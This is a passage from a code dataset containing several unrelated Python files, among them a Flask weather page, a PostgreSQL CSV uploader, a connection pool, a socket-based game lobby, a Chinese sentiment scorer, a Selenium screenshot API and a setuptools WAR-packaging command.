\"\r\n\r\n@app.route('/')\r\ndef test():\r\n response = requests.get(\"https://api.weather.gov/gridpoints/SEW/130,67/forecast\")\r\n text = response.text\r\n json_string = json.loads(text)\r\n properties = json_string['properties']\r\n periods = properties['periods']\r\n ## periods is a list\r\n ##day1\r\n day1 = periods[0]\r\n name1 = day1[\"name\"]\r\n temp1 = day1[\"temperature\"]\r\n cast1 = day1[\"shortForecast\"]\r\n ##day2\r\n day2 = periods[1]\r\n name2 = day2[\"name\"]\r\n temp2 = day2[\"temperature\"]\r\n cast2 = day2[\"shortForecast\"]\r\n ##day3\r\n day3 = periods[2]\r\n name3 = day3[\"name\"]\r\n temp3 = day3[\"temperature\"]\r\n cast3 = day3[\"shortForecast\"]\r\n ##day4\r\n day4 = periods[3]\r\n name4 = day4[\"name\"]\r\n temp4 = day4[\"temperature\"]\r\n cast4 = day4[\"shortForecast\"]\r\n ##day5\r\n day5 = periods[4]\r\n name5 = day5[\"name\"]\r\n temp5 = day5[\"temperature\"]\r\n cast5 = day5[\"shortForecast\"]\r\n return render_template(\"west.html\", day1name=name1, day2name=name2, day3name=name3, day4name=name4, day5name=name5, day1temp=temp1, day2temp=temp2, day3temp=temp3, day4temp=temp4, day5temp=temp5, day1cast=cast1, day2cast=cast2, day3cast=cast3, day4cast=cast4,day5cast=cast5)\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n#this is a comment","sub_path":"west_us/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"636494951","text":"import os\n\nimport pandas as pd\nimport psycopg2\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom user_similarity_model.config.core import DATASET_DIR, SQL_DIR, config\n\n\ndef load_csv_files(filename):\n \"\"\"read csv files bases on the filename\n\n Args:\n filename ([type]): name of the file\n\n Returns:\n DataFrame: A csv file\n \"\"\"\n csv_file = pd.read_csv(os.path.join(DATASET_DIR, filename))\n return csv_file\n\n\ndef _create_tables():\n \"\"\" create tables schema in the PostgreSQL database\"\"\"\n conn = None\n try:\n conn = psycopg2.connect(**config.app_config.database_specs)\n cur = conn.cursor()\n with open(os.path.join(SQL_DIR, \"tabels-schema.sql\")) as file:\n query = file.read()\n cur.execute(query)\n # close communication with the PostgreSQL database server\n cur.close()\n # commit the changes\n conn.commit()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n\n\ndef upload_csv():\n \"\"\"Upload the csv to tables in the PostgreSQL database using the\n credentials in the config.yml file\n \"\"\"\n _create_tables()\n specs = config.app_config.database_specs\n engine = None\n engine = SQLAlchemy.create_engine(\n \"postgresql+psycopg2://{}:{}@{}:{}/{}?sslmode=require\".format(\n specs[\"user\"],\n specs[\"password\"],\n specs[\"host\"],\n specs[\"port\"],\n specs[\"dbname\"],\n )\n )\n for file in config.app_config.csv_files:\n load_csv_files(file).to_sql(file[0:-4], engine, if_exists=\"replace\")\n","sub_path":"user_similarity_model/processing/data_upload_manager.py","file_name":"data_upload_manager.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"548380644","text":"#!/usr/bin/env python\r\nfrom __future__ import with_statement\r\n\r\nimport time\r\nfrom datetime import datetime\r\nimport threading\r\nimport weakref\r\n\r\nclass FakeLock(object):\r\n def __enter__(self):\r\n return self\r\n\r\n def __exit__(self, exc_type, exc_value, traceback):\r\n pass\r\n\r\nclass BaseConnection(object):\r\n @property\r\n def connected(self):\r\n raise NotImplemented()\r\n \r\n def reconnect(self):\r\n raise NotImplemented()\r\n \r\n def reset(self):\r\n pass\r\n \r\n def __del__(self):\r\n self.reset()\r\n \r\n if hasattr(self, '_pool'):\r\n self._pool.put(self)\r\n\r\nclass ConnectionPool(object):\r\n WAIT_FOREVER = None\r\n WAIT_NERVER = 0\r\n \r\n def __init__(self, connection_creator, min_connections=0, max_connections=10,\r\n multithreads=False):\r\n self.connection_creator = connection_creator\r\n self.min_connections = min_connections\r\n self.max_connections = max_connections\r\n \r\n self.lock = threading.Lock() if multithreads else FakeLock()\r\n self.idle_notify = threading.Event() if multithreads else None\r\n self.idle_conns = []\r\n self.used_conns = weakref.WeakKeyDictionary()\r\n \r\n if self.min_connections: \r\n for i in range(self.min_connections):\r\n conn = self.connection_creator()\r\n \r\n if conn:\r\n self.idle_conns.append(conn)\r\n \r\n def __nonzero__(self):\r\n with self.lock:\r\n return (len(self.idle_conns) > 0) or (len(self.used_conns) < self.max_connections)\r\n \r\n def __len__(self):\r\n with self.lock:\r\n return len(self.idle_conns) + len(self.used_conns)\r\n \r\n def __repr__(self):\r\n return \"<%s object (idle=%d, used=%d) at %08x>\" % (type(self).__name__, len(self.idle_conns), len(self.used_conns), id(self))\r\n \r\n def get(self, timeout=WAIT_FOREVER):\r\n \"\"\"\r\n get a connection from pool\r\n \r\n @param wait timeout for available connection (0 = nowait, None = forever)\r\n @return connection or None\r\n \r\n \"\"\"\r\n while True:\r\n with self.lock:\r\n # try to get a connection from idle pool first \r\n conn = self.idle_conns.pop(0) if self.idle_conns else None\r\n \r\n if conn:\r\n # ensure the connection was connected or try to reconnect\r\n # if reconnect failed, drop the connection and try again\r\n \r\n try:\r\n if conn.connected:\r\n break\r\n \r\n if conn.reconnect(): \r\n break\r\n except AttributeError:\r\n # ignore the connection instance doesn't support connected or reconnect\r\n pass \r\n else:\r\n # if no idle connection and not to many used, try to create one \r\n if len(self.used_conns) < self.max_connections:\r\n conn = self.connection_creator()\r\n break \r\n \r\n # if too many used connections, return None for nowait \r\n if timeout == ConnectionPool.WAIT_NERVER:\r\n break\r\n \r\n # wait for idle connection, and try again without wait\r\n if self.idle_notify:\r\n if timeout:\r\n start_time = time.clock()\r\n \r\n self.idle_notify.wait(timeout) \r\n \r\n if timeout:\r\n timeout = timeout - (time.clock() - start_time)\r\n \r\n if timeout < 0:\r\n timeout = ConnectionPool.WAIT_NERVER\r\n \r\n continue\r\n else:\r\n break\r\n \r\n if conn:\r\n conn._pool = self \r\n \r\n # add connection to used pool for tracing\r\n with self.lock:\r\n self.used_conns[conn] = datetime.now()\r\n \r\n return conn\r\n \r\n def put(self, conn):\r\n with self.lock:\r\n if len(self.idle_conns) < self.min_connections:\r\n self.idle_conns.append(conn)\r\n \r\n if self.used_conns.has_key(conn):\r\n del self.used_conns[conn]\r\n \r\n if self.idle_notify:\r\n self.idle_notify.set()\r\n self.idle_notify.clear()\r\n ","sub_path":"urllib4/connpool.py","file_name":"connpool.py","file_ext":"py","file_size_in_byte":4786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"518141099","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 24 15:36:29 2018\n\n@author: owen\n\"\"\"\n\n# Let's call an array A a mountain if the following properties hold:\n\n# A.length >= 3\n# There exists some 0 < i < A.length - 1 such that A[0] < A[1] < ... A[i-1] < A[i] > A[i+1] > ... > A[A.length - 1]\n\n# Given an array that is definitely a mountain, return any i such that A[0] < A[1] < ... A[i-1] < A[i] > A[i+1] > ... > A[A.length - 1].\n\n#class Solution:\n# def peakIndexInMountainArray(self, A):\n# \"\"\"\n# :type A: List[int]\n# :rtype: int\n# \"\"\"\n# # time O(n), space O(1)\n# n=len(A)\n# for i in range(n-1):\n# if A[i]>A[i+1]:\n# return i\n \n#class Solution:\n# def peakIndexInMountainArray(self, A):\n# \"\"\"\n# :type A: List[int]\n# :rtype: int\n# \"\"\"\n# return A.index(max(A))\n \n \nclass Solution:\n def peakIndexInMountainArray(self, A):\n \"\"\"\n :type A: List[int]\n :rtype: int\n \"\"\"\n # Binary search, time O(log n), space O(1)\n lo,hi=0,len(A)-1\n while lo= 3 else False\n players = []\n\n for p in cursor:\n if 'ready' not in p:\n start_ready = False\n p['_id'] = str(p['_id'])\n p['game_id'] = str(p['game_id'])\n players.append(p)\n\n if start_ready:\n start_game(id, players, short_code)\n else:\n if players:\n emit('players', players, room=short_code)\n else:\n re_col('games').delete_one({\n '_id': id\n })\n\n\n@io.on('connect')\ndef connect():\n leave_game()\n username = session['username'] if 'username' in session else ''\n emit('load_HTML', render_template('set_user.pug', username=username))\n\n\n@io.on('disconnect')\ndef disconnect():\n leave_game()\n\n\n@io.on('set_user')\ndef new_user_socket(username):\n leave_game()\n if 'id' in session:\n player_id = session['id']\n re_col('players').update_one(\n {'_id': session['id']},\n {'$set': {'username': username}},\n upsert=True)\n else:\n player_id = re_col('players').insert_one(\n {'username': username}).inserted_id\n session['id'] = player_id\n\n session['username'] = username\n\n emit('player_id', str(player_id))\n emit('load_HTML', render_template('join_game.pug'))\n\n\n@io.on('load_join_game')\ndef load_join_game():\n leave_game()\n emit('load_HTML', render_template('join_game.pug'))\n\n\n@io.on('load_create_game')\ndef load_create_game():\n leave_game()\n short_code = ''.join(random.sample(ascii_lowercase, 4))\n emit('load_HTML', render_template('create_game.pug',\n short_code=short_code))\n\n\n@io.on('join_game')\ndef join_game(short_code):\n leave_game()\n game = re_col('games').find_one({'short_code': short_code})\n if not game:\n emit('join_error', 'Game does not exist')\n elif game['state'] != 0:\n emit('join_error', 'Game already started')\n else:\n re_col('players').update_one(\n {'_id': session['id']},\n {'$set': {'game_id': game['_id']}},\n upsert=True)\n join_room(short_code)\n session['game_id'] = game['_id']\n session['room'] = short_code\n emit('load_HTML', render_template(\n 'game_state_0.pug', short_code=short_code))\n emit_players(game['_id'], short_code)\n\n\n@io.on('ready')\ndef ready():\n re_col('players').update_one(\n {'_id': session['id']},\n {'$set': {'ready': True}},\n upsert=True)\n emit_players(session['game_id'], session['room'])\n\n\n@io.on('unready')\ndef unready():\n re_col('players').update_one(\n {'_id': session['id']},\n {'$unset': {'ready': ''}},\n upsert=True)\n emit_players(session['game_id'], session['room'])\n\n\n@io.on('create_game')\ndef create_game(short_code):\n leave_game()\n if re_col('games').find_one({'short_code': short_code}):\n emit('create_error', 'Short code already in use')\n elif re.findall('[^A-Za-z0-9]+', short_code):\n emit('create_error', 'Short code must be alphanumeric')\n else:\n re_col('games').insert_one({'short_code': short_code, 'state': 0})\n join_game(short_code)\n\n\n@app.route('/')\ndef start():\n return render_template('start.pug')\n","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":5864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"491888581","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 9 01:15:05 2017\n\n@author: juzheng\n\"\"\"\n\nimport jieba\nfrom collections import defaultdict\nfrom DICT import Nolist, Degreedict, NLPdict\nimport os\nimport matplotlib.pyplot as plt\n\nfilelist = os.listdir('C:\\\\Users\\\\juzheng\\\\Desktop\\\\pinglun')\ndef fileopen(filename):\n with open(filename, 'r') as fp:\n chap = fp.read()\n with open('C:\\\\Users\\\\juzheng\\\\Desktop\\\\tyc.txt', 'r') as fp:\n stopwords = fp.readlines()\n stopwordlist = []\n for word in stopwords:\n stopwordlist.append(word.strip())\n wordlist = []\n words = jieba.cut(chap, cut_all=False)\n for word in words:\n if word not in stopwordlist:\n if word != ' ':\n wordlist.append(word)\n print(wordlist)\n worddict = defaultdict()\n i = 0\n for word in wordlist:\n worddict[word] = i\n i = i + 1\n NLP = NLPdict.keys()\n degree = Degreedict.keys()\n senword = defaultdict()\n degreeword = defaultdict()\n noword = defaultdict()\n NLPl = []\n degreel = []\n nol = []\n p = 0\n for word in wordlist:\n if word == '。':\n p = p + 1\n if word in NLP:\n if word not in degree:\n if word not in Nolist:\n NLPl.append(word)\n senword[worddict[word]] = NLPdict[word]\n if word in degree:\n if word not in Nolist:\n degreel.append(word)\n degreeword[worddict[word]] = Degreedict[word]\n if word in Nolist:\n nol.append(word)\n noword[worddict[word]] = -1\n senloc = senword.keys()\n degreeloc = degreeword.keys()\n noloc = noword.keys()\n senloc = list(senloc)\n degreeloc = list(degreeloc)\n noloc = list(noloc)\n sennum = -1\n Sum = 0\n for i in range(len(wordlist)):\n d = 1\n score = 0\n if i in senloc:\n score = d * float(senword[i])\n sennum += 1\n if sennum < len(senloc) - 1:\n for j in range(senloc[sennum - 1], senloc[sennum]):\n if j in noloc:\n d *= -1\n elif j in degreeloc:\n score = score * d * float(degreeword[j])\n Sum += score\n ave = Sum / p\n return ave\nresult = []\nfor file in filelist:\n filename = 'C:\\\\Users\\\\juzheng\\\\Desktop\\\\pinglun\\\\' + file\n m = fileopen(filename)\n result.append(m)\nplt.figure()\nx = [1, 2, 3, 4, 5]\ny = result\nplt.scatter(x, y)\nplt.xticks([1, 2, 3, 4, 5])\nplt.ylabel('score')\nplt.savefig('C:\\\\Users\\\\juzheng\\\\Desktop\\\\score2.jpg')\nplt.show()\n","sub_path":"pingfen.py","file_name":"pingfen.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"449126472","text":"import cherrypy # webserver framework\nimport tldextract\nimport json \nfrom cherrypy import _cperror\nimport os\nimport page_content #screenshot library\nimport time\nimport hashlib \nfrom tokens import get_tokens #list of valid tokens\nfrom PIL import Image #screenshot image file\nimport base64 # encode the output result\nimport sc_config\n\n# debug_level (False->production,True->development)\ndebug_level = False\n\ndef error_page_default(status, message, traceback, version):\n print(\"**********************\")\n print(cherrypy.request.headers)\n print('**********************')\n # return \"maintenance,{}\".format(status)\n try:\n dbg_info = ''\n global debug_level\n if (debug_level):\n dbg_info = \"{},{},{},{}\".format(status,message,traceback.replace(\"\\n\",\"
\"),version)\n return \"FORBIDDEN AREA - NOT FOUND
{}\".format(dbg_info)\n else:\n if status.startswith('404'):\n return not_found_html()\n #end if\n return \"VIVA :-)\"\n #end if\n except:\n return \"FORBIDDEN AREA / NOT FOUND AREA\"\n #end try\n#end def\n\ndef get_client_ip(headers):\n result = dict()\n result['remote_ip'] = None\n result['cf_user_ip'] = None\n result['client_ip'] = None\n result['visit_via_cf'] = False\n if headers == None or isinstance(headers,dict) == False:\n return result;\n #end if\n if headers.get('Remote-Addr',None) == None:\n return result\n #end if\n remote_ip = headers.get('Remote-Addr');\n result['remote_ip'] = remote_ip\n result['client_ip'] = remote_ip\n if headers.get(\"CF-Connecting-IP\",None) != None:\n cf_user_ip = headers.get(\"CF-Connecting-IP\")\n result['cf_user_ip'] = cf_user_ip\n result['client_ip'] = cf_user_ip\n #end if\n return result\n#end def\n\n\n\ndef not_found_html():\n return open('custom_page/404.html').read()\n# end def\n\n\ndef suspend_page():\n return open(\"custom_page/500.html\").read()\n#end def\n\n\nclass Screenshots(object):\n @cherrypy.expose\n def index(self,cat = None,username = None,password = None,submit = None,*args, **kwargs):\n print(\"**********************\")\n print(cherrypy.request.headers)\n print('**********************')\n ips = get_client_ip(cherrypy.request.headers)\n #cherrypy.response.status = 404\n #return cherrypy.request.headers[\"Remote-Addr\"]\n return open('index.html')\n #end if\n\n @cherrypy.expose\n def api(self,url=None,token=None,user_agent = None,proxy = None ,*args, **kwargs):\n\n print(\"**********************\")\n print(cherrypy.request.headers)\n print('**********************')\n # check if token is valid\n if not self.check_token_param(token):\n return json.dumps({\n 'success':False,\n 'code':403,\n 'msg':'Not authorized',\n 'attr':None}).encode('utf-8')\n # check validity of User-Agent\n user_agent = self.sanitize_user_agent(user_agent)\n # check validity of the URL\n if proxy != None:\n if not self.sanitize_proxy(proxy):\n return json.dumps({\n 'success':False,\n 'code':502,\n 'msg':'Wrong proxy format (Must be in a form of IP:PORT)',\n 'attr':None}).encode('utf-8') \n if not self.sanitize_url(url):\n return json.dumps({\n 'success':False,\n 'code':502,\n 'msg':'Wrong URL format (must start with http:// or https:// and no IP address)',\n 'attr':None}).encode('utf-8')\n # everything's fine...let's get screenshot\n return self.fetch_screenshot(url,user_agent,proxy).encode('utf-8')\n #end def\n\n def sanitize_url(self,url):\n \"\"\"\n Check if URL:\n 1. is string and -ne ''\n 2. starts with 'http' or 'https'\n 3. is not 'localhost' or '127.0.0.1'\n 4. len(url) < 1000\n \"\"\"\n result = [False]\n if not isinstance(url,str) or url.strip() == '' or url == None:result.append(True)\n if not url.startswith(\"http://\") and not url.startswith(\"https://\"):result.append(True)\n if len(url)>1000:result.append(True)\n tldparser = tldextract.extract(url)\n if tldparser.domain == '127.0.0.1':result.append(True)\n if tldparser.domain == 'localhost':result.append(True)\n if tldparser.suffix == '':result.append(True) # we do not scan IP addresses\n if any(result):return False\n return True\n #end def\n def sanitize_proxy(self,prx):\n # check if the proxy has two parts (port:IP)\n if not isinstance(prx,str):return False\n if prx.find(\":\") == -1:return False\n if len(prx)>21:return False\n prx = prx.split(\":\")\n prx = [x.strip() for x in prx if x.strip() != '']\n if len(prx) != 2:return False\n port = None\n ip = None\n try:\n port = int(prx[1])\n if port > 65535:return False\n ip = prx[0]\n if ip.count('.')!= 3:return False\n valid_char = ['0','1','2','3','4','5','6','7','8','9','.']\n if not all([True if x in valid_char else False for x in ip]):return False\n ip = ip.split(\".\")\n ip = [int(x) for x in ip]\n if any([True if x > 255 else False for x in ip]):return False\n return True\n except:\n return False\n def fetch_screenshot(self,url,user_agent,proxy):\n try:\n har = False\n if sc_config.config.get(\"HAR\",1) == 1:har = True\n pc = page_content.page_content(user_agent)\n result = pc.selenium_get(url,return_content=False,return_handle=True,headless=True,return_title=False,proxy = proxy,return_har = har)\n if result != None and isinstance(result,dict) and result.get(\"handle\",None)!=None:\n handle = result.get('handle')\n #wait 6 seconds before taking screenshots\n #time.sleep(6)\n f_name = hashlib.md5(str(time.time()).encode()).hexdigest()\n result = handle.save_screenshot(f_name + '.png')\n html = handle.page_source\n title = handle.title\n har_log = []\n if har:\n try:\n for entry in handle.get_log('performance'):\n har_log.append(entry)\n except:\n pass\n destination = handle.current_url\n if result != False:\n im = Image.open(f_name + '.png')\n bg = Image.new(\"RGB\", im.size, (255,255,255))\n bg.paste(im,im)\n bg.save(f_name + '.jpg')\n try:\n os.remove(f_name + '.png')\n f = open(f_name + '.jpg','rb')\n data = f.read()\n f.close()\n os.remove(f_name + '.jpg')\n data = base64.encodebytes(data).decode()\n handle.quit()\n return json.dumps({'success':True,'code':200,'msg':'success','attr':{\n \"shot\":{'success':True,'data':data},\n 'title':title,\n 'html':html,\n 'har':har_log,\n 'destination':destination}})\n except Exception as e:\n print(e)\n handle.quit()\n return json.dumps({'success':True,'code':200,'msg':'success','attr':{\n 'shot':{'success':False,'data':None},\n 'title':title,\n 'html':html,\n 'har':har_log,\n 'destination':destination}})\n #end\n else:\n handle.quit()\n return json.dumps({'success':True,'code':200,'msg':'success','attr':{\n 'shot':{'success':False,'data':None},\n 'title':title,\n 'html':html,\n 'har':har_log,\n 'destination':destination}})\n else:\n return json.dumps({'success':False,'code':503,'msg':'Unknown error1','attr':None})\n except Exception as e:\n print(e)\n return json.dumps({'success':False,'code':503,'msg':'Unknown error','attr':None})\n #end except\n #end def\n\n\n def sanitize_user_agent(self,user_agent):\n \"\"\"\n Checks if user-agent:\n 1. is instance of string\n 2. len(useragent) < 150\n \"\"\"\n if user_agent == None:return ''\n if isinstance(user_agent,str):\n if len(user_agent) > 150:\n return user_agent[:150]\n else:\n return user_agent\n #end if\n else:\n return ''\n #end def\n \n def check_token_param(self,token):\n \"\"\"\n Checks if token:\n 1. is istring (and not None)\n 2. is not empty\n 3. len(token) == 64\n 4. exists in authorized token list\n \"\"\"\n if not isinstance(token,str) or token == '' or len(token) != 64 :return False\n tokens = get_tokens()\n if not isinstance(tokens,list):return False\n if token not in tokens:return False\n return True\n #end def\n#end class\n\n\nif __name__ == '__main__':\n # Run the server with the following configuration\n cherrypy.config.update({'server.socket_host': '0.0.0.0',\n 'server.socket_port': 8086,\n 'error_page.default': error_page_default\n })\n conf = {\n '/': {\n 'tools.encode.on': True,\n 'tools.encode.encoding': 'utf-8',\n 'tools.response_headers.on': True,\n 'tools.response_headers.headers': [\n ('Server', 'nginx'),\n ('X-XSS-Protection','1; mode=block')\n ],\n 'tools.sessions.on': True,\n 'tools.sessions.name' : \"PHPSESSID\",\n 'tools.staticdir.root': os.path.abspath(os.getcwd())\n },\n '/api':{\n 'tools.response_headers.on': True,\n 'tools.response_headers.headers': [('Content-Type','application/json')]\n },\n '/assets': {\n 'tools.staticdir.on': True,\n 'tools.staticdir.dir': os.path.abspath(os.getcwd()) + '/assets',\n 'tools.staticfile.root' : os.path.abspath(os.getcwd()) + \"/assets\"\n }\n }\n cherrypy.quickstart(Screenshots(),'',conf)\n","sub_path":"src/sc_api.py","file_name":"sc_api.py","file_ext":"py","file_size_in_byte":11672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"609492903","text":"import apb.config as config\nimport titlecase\n\nclass Base:\n _max_similar_tracks = config.read('general', 'max_similar_tracks')\n _max_top_tracks = config.read('general', 'max_top_tracks')\n _max_top_tags = config.read('general', 'max_top_tags')\n\n def __init__(self, artist=None, track=None):\n if artist and track:\n self.artist = titlecase(artist)\n self.track = titlecase(track)\n self.full_track = (self.artist, self.track)\n self.full_track_read = f'{self.artist} - {self.track}'\n self.track_url = None\n self.track_id = None\n self.similar_track_list = []\n elif artist and not track:\n self.artist = titlecase(artist)\n self.artist_id = None\n self.similar_artist_list = []\n\n self.tag_list = []\n","sub_path":"apb/servicebase.py","file_name":"servicebase.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"126790007","text":"import itertools\n\ndef solution(clothes):\n answer = 0\n kinds = {}\n for cloth in clothes:\n if cloth[1] in kinds:\n kinds[cloth[1]] += 1\n else:\n kinds[cloth[1]] = 1\n values = kinds.values()\n for i in range(1, len(values) + 1):\n combinations = list(itertools.combinations(values, i))\n for combination in combinations:\n temp = 1\n for val in combination:\n temp *= val\n answer += temp\n return answer\n\n ","sub_path":"Hash/spy.py","file_name":"spy.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"452464032","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.6-x86_64/egg/snakefight/command.py\n# Compiled at: 2011-05-18 20:43:47\n\"\"\"setuptools/distutils `bdist_war` command\"\"\"\nfrom __future__ import with_statement\nimport glob, os, shutil, sys, tempfile, zipfile\nfrom StringIO import StringIO\nfrom distutils import log\nfrom distutils.dir_util import mkpath, remove_tree\nfrom distutils.errors import DistutilsError, DistutilsOptionError\nfrom distutils.sysconfig import get_python_version\nfrom pkg_resources import working_set\nfrom setuptools import Command\nfrom snakefight.util import gen_paste_loadapp, gen_web_xml\nis_jython = sys.platform.startswith('java')\n\nclass bdist_war(Command):\n \"\"\"Create a WAR file from a Jython WSGI application\"\"\"\n description = __doc__\n user_options = [\n ('web-xml=', None, 'Path to the web.xml file'),\n ('war-prefix=', None, \"Prefix of the war file to build (defaults to distribution's egg name)\"),\n ('jython-home=', None, 'JYTHON_HOME (defaults to the current home when ran under jython)'),\n ('no-jython', None, \"Don't include the Jython distribution\"),\n ('include-jars=', None, 'List of jar files to include in WEB-INF/lib (space or comma-separated)'),\n ('paste-config=', None, 'paste.app_factory config file. Automatically generates a web.xml when specified'),\n ('paste-app-name=', None, 'paste.app_factory named application (defaults to main)')]\n boolean_options = [\n 'no-jython']\n\n def initialize_options(self):\n self.web_xml = None\n self.war_prefix = None\n self.jython_home = getattr(sys, 'real_prefix', sys.prefix) if is_jython else None\n self.no_jython = False\n self.include_jars = None\n self.paste_config = None\n self.paste_app_name = 'main'\n self.war = None\n return\n\n def finalize_options(self):\n if not self.no_jython and not is_jython and not self.jython_home:\n raise DistutilsOptionError(\"Not running under Jython and no 'jython-home' specified\")\n if not self.web_xml and not self.paste_config:\n raise DistutilsOptionError('No web.xml specified')\n self.ensure_string_list('include_jars')\n if self.include_jars:\n missing = [ jar for jar in self.include_jars if not os.path.exists(jar) ]\n if missing:\n raise DistutilsOptionError('include-java-libs do not exist: %s' % missing)\n self.egg_info = self.get_finalized_command('egg_info')\n self.dist_name = self.distribution.get_fullname()\n if is_jython:\n self.dist_name += '-py%s' % get_python_version()\n bdist = self.get_finalized_command('bdist')\n skel_dir = os.path.join(bdist.bdist_base, 'war')\n self.web_inf = os.path.join(skel_dir, 'WEB-INF' + os.sep)\n self.lib_python = os.path.join(self.web_inf, 'lib-python' + os.sep)\n if self.war_prefix is None:\n self.war_prefix = self.dist_name\n self.war_name = os.path.join(bdist.dist_dir, self.war_prefix + '.war')\n self.temp_war = os.path.join(skel_dir, os.path.basename(self.war_name))\n return\n\n def run(self):\n self.setup()\n try:\n self._run()\n finally:\n self.teardown()\n\n def _run(self):\n mkpath(os.path.dirname(self.web_inf), dry_run=self.dry_run)\n if not self.dry_run:\n self.war = zipfile.ZipFile(self.temp_war, 'w')\n if os.path.exists(self.lib_python):\n remove_tree(self.lib_python, dry_run=self.dry_run)\n mkpath(os.path.dirname(self.lib_python), dry_run=self.dry_run)\n self.add_eggs()\n self.add_jars()\n if not self.no_jython:\n self.add_jython()\n self.add_web_xml()\n mkpath(os.path.dirname(self.war_name), dry_run=self.dry_run)\n if not self.dry_run:\n self.war.close()\n shutil.move(self.temp_war, self.war_name)\n log.info('created %s' % self.war_name)\n\n def setup(self):\n sys.path.insert(0, self.egg_info.egg_base)\n working_set.add_entry(self.egg_info.egg_base)\n os.putenv('PYTHONPATH', os.path.abspath(self.lib_python))\n os.environ['PYTHONPATH'] = os.path.abspath(self.lib_python)\n log.set_verbosity(self.verbose)\n\n def teardown(self):\n os.unsetenv('PYTHONPATH')\n if 'PYTHONPATH' in os.environ:\n del os.environ['PYTHONPATH']\n if self.war:\n self.war.close()\n\n def write(self, arcpath, filename):\n arcname = os.path.join(arcpath, os.path.basename(filename))\n log.debug('adding %s' % arcname)\n if not self.dry_run:\n self.war.write(filename, arcname)\n\n def writestr(self, arcname, bytes):\n log.debug('adding %s' % arcname)\n if not self.dry_run:\n temp = tempfile.NamedTemporaryFile()\n temp.write(bytes)\n temp.flush()\n self.war.write(temp.name, arcname)\n\n def add_eggs(self):\n ei_kwargs = dict(args=['.', 'setuptools'], zip_ok=False, install_dir=self.lib_python, exclude_scripts=True, always_copy=True, local_snapshots_ok=True, sitepy_installed=True, verbose=0)\n self.reinitialize_command('easy_install', **ei_kwargs)\n log.info('running easy_install %s' % self.egg_info.egg_name)\n if self.verbose < 2:\n sys.stdout = sys.stderr = StringIO()\n try:\n if not self.dry_run:\n self.run_command('easy_install')\n finally:\n if self.verbose < 2:\n sys.stdout = sys.__stdout__\n sys.stderr = sys.__stderr__\n\n log.info('adding eggs (to WEB-INF/lib-python)')\n self.write_libs(self.lib_python)\n\n def write_libs(self, path):\n path = os.path.normpath(path)\n for (root, dirs, files) in os.walk(path):\n for file in files:\n arcpath = os.path.join('WEB-INF/lib-python', root[len(path) + 1:], file)\n log.debug('adding %s' % arcpath)\n if not self.dry_run:\n self.war.write(os.path.join(root, file), arcpath)\n\n def add_jython(self):\n jython_complete = os.path.join(self.jython_home, 'jython.jar')\n jython = os.path.join(self.jython_home, 'jython-dev.jar')\n if os.path.exists(jython_complete):\n log.info('adding WEB-INF/lib/%s' % os.path.basename(jython_complete))\n self.write('WEB-INF/lib', jython_complete)\n self.write_libs(os.path.join(self.jython_home, 'Lib'))\n elif os.path.exists(jython):\n log.info('adding WEB-INF/lib/%s and its jars/libs' % os.path.basename(jython))\n self.write('WEB-INF/lib', jython)\n for path in glob.iglob(os.path.join(self.jython_home, 'javalib', '*.jar')):\n self.write('WEB-INF/lib', path)\n\n self.write_libs(os.path.join(self.jython_home, 'Lib'))\n else:\n raise DistutilsError('Could not find Jython distribution')\n\n def add_jars(self):\n if not self.include_jars:\n return\n log.info('adding jars (to WEB-INF/lib)')\n for jar in self.include_jars:\n self.write('WEB-INF/lib', jar)\n\n def add_web_xml(self):\n if not self.web_xml:\n app_import_name = self.add_paste_loadapp(self.paste_config, self.paste_app_name)\n log.info('generating deployment descriptor')\n web_xml = gen_web_xml(display_name=self.distribution.get_name(), description=self.distribution.get_description(), app_import_name=app_import_name)\n else:\n with open(self.web_xml) as (fp):\n web_xml = fp.read()\n filename = 'WEB-INF/web.xml'\n log.info('adding deployment descriptor (%s)' % filename)\n self.writestr(filename, web_xml)\n\n def add_paste_loadapp(self, config, app_name):\n log.info('adding Paste ini file (to %s)' % os.path.basename(config))\n self.write('WEB-INF', self.paste_config)\n filename = 'WEB-INF/lib-python/____loadapp.py'\n log.info('adding Paste app loader (to %s)' % filename)\n self.writestr(filename, gen_paste_loadapp(config, app_name))\n return '____loadapp.loadapp()'","sub_path":"pycfiles/snakefight-0.5-py2.5/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":8314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"364806893","text":"from numpy import *\nimport matplotlib.pyplot as plt\n\n\ndef load_data_arr(file_name):\n \"\"\"\n 加载西瓜3.0alpha 数据,密度、含糖量、好瓜坏瓜。\n hsplit(data_arr, (a, b))按列切割(竖直切割)\n 0<= column =b,把数据分成三部分;\n hsplit(data_arr, (a,)),把数据分成两部分。\n :param file_name: 文件名\n :return:\n \"\"\"\n data_set = []\n with open(file_name, 'r') as fr:\n for line in fr.readlines():\n data_set.append(list(map(float, line.strip('\\n').split(' ')))) # map/reduce\n data_arr = array(data_set)\n 